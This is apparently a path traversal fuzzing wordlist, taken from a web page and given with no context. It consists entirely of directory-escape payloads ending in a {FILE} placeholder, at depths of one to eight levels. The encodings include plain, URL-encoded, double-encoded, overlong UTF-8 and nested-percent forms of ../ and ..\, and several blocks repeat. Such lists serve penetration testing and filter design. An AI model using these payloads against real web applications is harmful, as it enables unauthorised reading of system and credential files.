..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
../{FILE}&lt;br /&gt;
../../{FILE}&lt;br /&gt;
../../../{FILE}&lt;br /&gt;
../../../../{FILE}&lt;br /&gt;
../../../../../{FILE}&lt;br /&gt;
../../../../../../{FILE}&lt;br /&gt;
../../../../../../../{FILE}&lt;br /&gt;
../../../../../../../../{FILE}&lt;br /&gt;
..%2f{FILE}&lt;br /&gt;
..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
..%252f{FILE}&lt;br /&gt;
..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
..\{FILE}&lt;br /&gt;
..\..\{FILE}&lt;br /&gt;
..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..%5c{FILE}&lt;br /&gt;
..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
..%255c{FILE}&lt;br /&gt;
..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
../{FILE}&lt;br /&gt;
../../{FILE}&lt;br /&gt;
../../../{FILE}&lt;br /&gt;
../../../../{FILE}&lt;br /&gt;
../../../../../{FILE}&lt;br /&gt;
../../../../../../{FILE}&lt;br /&gt;
../../../../../../../{FILE}&lt;br /&gt;
../../../../../../../../{FILE}&lt;br /&gt;
..%2f{FILE}&lt;br /&gt;
..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
..%252f{FILE}&lt;br /&gt;
..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
..\{FILE}&lt;br /&gt;
..\..\{FILE}&lt;br /&gt;
..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..%5c{FILE}&lt;br /&gt;
..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
